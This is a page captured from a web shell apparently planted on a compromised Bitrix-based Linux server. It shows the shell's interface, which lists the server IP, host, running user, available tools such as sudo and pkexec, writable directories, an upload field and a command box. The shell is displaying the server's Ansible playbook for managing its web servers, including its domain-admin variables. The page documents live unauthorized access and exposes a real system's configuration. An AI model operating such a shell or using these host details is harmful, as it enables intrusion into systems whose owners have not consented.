403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /etc/ansible/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /etc/ansible/web.yml
---
# This playbook manage web servers on bitrix-hosts hosts
- hosts: bitrix-hosts
  any_errors_fatal: true
  # you can modify role by setting manage_web to:
  # update - update settings for all web servers
  vars:
    manage_web: NOT_DEFINED
    new_web_server: NOT_DEFINED
    deleted_web_server: NOT_DEFINED
    web_site_name: NOT_DEFINED
    web_site_type: link
    web_site_dir: NOT_DEFINED
    web_site_dbuser: NOT_DEFINED
    web_site_dbpass_file: NOT_DEFINED
    web_site_db: NOT_DEFINED
    web_site_cron: disable
    fstype: lsync
    # kernel site name: if it exists in pool
    web_kernel_site: NOT_DEFINED
    # kernel site dir
    web_kernel_root: NOT_DEFINED
    # netbios domain name (ex. BX)
    ntlm_name: NOT_DEFINED
    # full domain name (ex. BX.OFFICE)
    ntlm_fqdn: NOT_DEFINED
    # domain password server (ex. DC1.BX.OFFICE)
    ntlm_dps: NOT_DEFINED
    # netbios hostname 
    ntlm_host: NOT_DEFINED
    # domain admin user
    ntlm_user: Administrator
    # password for domain user
    ntlm_pass: NOT_DEFINED
    # for secure transmission parameters
    ansible_playbook_file: NOT_DEFINED
    # for debug playbook
    ansible_playbook_debug: NOT_DEFINED
  roles:
  - web

- hosts: bitrix-hosts
  vars:
    cache_directory: /opt/webdir/tmp
  roles:
    - cleaner

Youez - 2016 - github.com/yon3zu
LinuXploit